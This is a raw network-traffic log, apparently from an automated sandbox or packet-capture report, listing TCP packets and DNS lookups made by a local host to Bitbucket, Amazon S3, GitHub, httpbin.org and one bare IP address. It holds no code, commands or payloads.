                                                Aug 27, 2024 12:55:18.651667118 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.652369022 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.652388096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.652506113 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.652519941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.652561903 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.669876099 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.669892073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.669955015 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.669961929 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.670006990 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.737257957 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.737284899 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.737348080 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.737370968 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.737385035 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.737421989 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.737962008 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.737977028 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.738030910 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.738042116 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.738085032 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.738671064 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.738696098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.738770008 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.738770008 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.738779068 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.739329100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.739343882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.739350080 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.739361048 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:18.739398956 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:18.739447117 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.371385098 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.371427059 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.440000057 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.440023899 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.440090895 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.440099955 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.440121889 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.440140009 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.442533016 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.442548990 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.442610025 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.442615986 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.442656040 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.442982912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.442998886 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.443052053 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.443058014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.443104982 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.444849014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.444864988 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.444924116 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.444931984 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.444972038 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.446628094 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.446643114 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.446702957 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.446715117 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.446753025 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.450135946 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.450151920 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.450207949 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.450215101 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.450258017 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.450603962 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.450618982 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.450664043 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.450670958 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.450690031 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.450711966 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.458887100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.458901882 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.458961964 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.458969116 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.459028006 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.527857065 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.527873993 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.527956009 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.527964115 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.528009892 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.530225039 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.530240059 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.530329943 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.530338049 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.530388117 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.530697107 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.530710936 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.530771017 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.530778885 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.530821085 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.532356977 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.532371044 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.532438040 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.532445908 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.532495022 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.534044027 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.534060001 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.534107924 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.534116983 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.534132957 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.534159899 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.537889004 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.537909031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.537954092 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.537961960 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.537985086 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.537996054 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.538299084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.538320065 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.538355112 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.538361073 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.538386106 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.538402081 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.547128916 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.547144890 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.547213078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.547223091 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.547264099 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.615607977 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.615626097 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.615741014 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.615748882 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.615792036 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.617899895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.617914915 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.617971897 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.617978096 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.618020058 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.618304014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.618319035 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.618375063 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.618382931 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.618421078 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.619946003 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.619961023 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.620023012 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.620029926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.620074987 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.621582985 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.621598005 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.621656895 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.621665001 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.621707916 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.625479937 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.625494957 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.625577927 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.625583887 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.625627041 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.625920057 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.625933886 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.625988960 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.625996113 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.626039028 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.634569883 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.634591103 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.634681940 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.634689093 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.634732962 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.712213993 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712232113 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712285995 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712305069 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712347031 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712361097 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712547064 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.712562084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712817907 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712840080 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712879896 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.712888002 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.712919950 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.713329077 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.713347912 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.713401079 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.713411093 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.714842081 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.714858055 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.714911938 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.714920044 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.714931011 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.714945078 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.714967966 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.714976072 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.715013027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.722134113 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.722157001 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.722196102 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.722204924 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.722229958 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.771365881 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.798063040 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.798088074 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.798170090 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.798177958 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.798212051 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.798233032 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.799350023 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.799365044 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.799429893 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.799438000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.799482107 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.799906015 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.799922943 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.799983025 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.799989939 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.800038099 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.800415993 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.800431013 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.800498962 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.800504923 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.800546885 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.800787926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.800802946 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.800858974 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.800867081 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.800909042 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.801770926 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.801786900 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.801846027 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.801853895 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.801894903 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.802040100 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.802053928 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.802186966 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.802195072 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.802251101 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.809814930 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.809830904 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.809919119 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.809926033 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.809969902 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.887662888 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.887686014 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.887861967 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.887871981 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.887917995 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.888645887 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.888679028 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.888740063 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.888747931 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.888789892 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.888791084 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.888809919 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.888825893 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.888851881 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.888858080 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.888887882 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.888906002 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.888942957 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.888962984 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889013052 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889019012 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889060974 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889111996 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889136076 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889170885 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889177084 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889204025 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889219046 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889226913 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889246941 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889281034 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889287949 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889319897 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889327049 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889415979 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889431000 CEST4434970752.216.214.209192.168.2.5
                                                Aug 27, 2024 12:55:19.889477968 CEST49707443192.168.2.552.216.214.209
                                                Aug 27, 2024 12:55:19.889484882 CEST4434970752.216.214.209192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 27, 2024 12:55:11.756688118 CEST | 64650 | 53 | 192.168.2.5 | 1.1.1.1
Aug 27, 2024 12:55:12.258321047 CEST | 53 | 64650 | 1.1.1.1 | 192.168.2.5
Aug 27, 2024 12:55:13.597923994 CEST | 50277 | 53 | 192.168.2.5 | 1.1.1.1
Aug 27, 2024 12:55:13.624684095 CEST | 53 | 50277 | 1.1.1.1 | 192.168.2.5
Aug 27, 2024 12:55:20.460791111 CEST | 52952 | 53 | 192.168.2.5 | 1.1.1.1
Aug 27, 2024 12:55:20.468146086 CEST | 53 | 52952 | 1.1.1.1 | 192.168.2.5
Aug 27, 2024 12:55:50.872682095 CEST | 63535 | 53 | 192.168.2.5 | 1.1.1.1
Aug 27, 2024 12:55:50.879483938 CEST | 53 | 63535 | 1.1.1.1 | 192.168.2.5
Aug 27, 2024 12:55:59.437446117 CEST | 63426 | 53 | 192.168.2.5 | 1.1.1.1
Aug 27, 2024 12:55:59.444689989 CEST | 53 | 63426 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 27, 2024 12:55:11.756688118 CEST | 192.168.2.5 | 1.1.1.1 | 0x7944 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:13.597923994 CEST | 192.168.2.5 | 1.1.1.1 | 0xd830 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:20.460791111 CEST | 192.168.2.5 | 1.1.1.1 | 0xb186 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:50.872682095 CEST | 192.168.2.5 | 1.1.1.1 | 0x910e | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:59.437446117 CEST | 192.168.2.5 | 1.1.1.1 | 0x9fe2 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 27, 2024 12:55:12.258321047 CEST | 1.1.1.1 | 192.168.2.5 | 0x7944 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:12.258321047 CEST | 1.1.1.1 | 192.168.2.5 | 0x7944 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:12.258321047 CEST | 1.1.1.1 | 192.168.2.5 | 0x7944 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.214.209 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.198.105 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.139.35 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.210 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.21.110 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.107 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.220.97 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:13.624684095 CEST | 1.1.1.1 | 192.168.2.5 | 0xd830 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.196.217 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:20.468146086 CEST | 1.1.1.1 | 192.168.2.5 | 0xb186 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:20.468146086 CEST | 1.1.1.1 | 192.168.2.5 | 0xb186 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:20.468146086 CEST | 1.1.1.1 | 192.168.2.5 | 0xb186 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:20.468146086 CEST | 1.1.1.1 | 192.168.2.5 | 0xb186 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:50.879483938 CEST | 1.1.1.1 | 192.168.2.5 | 0x910e | No error (0) | github.com | | 140.82.121.3 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:59.444689989 CEST | 1.1.1.1 | 192.168.2.5 | 0x9fe2 | No error (0) | httpbin.org | | 34.194.69.213 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 12:55:59.444689989 CEST | 1.1.1.1 | 192.168.2.5 | 0x9fe2 | No error (0) | httpbin.org | | 3.211.178.193 | A (IP address) | IN (0x0001) | false
                                                • bitbucket.org
                                                • bbuseruploads.s3.amazonaws.com
                                                • raw.githubusercontent.com
                                                • github.com
                                                • https:
                                                • 45.125.66.18
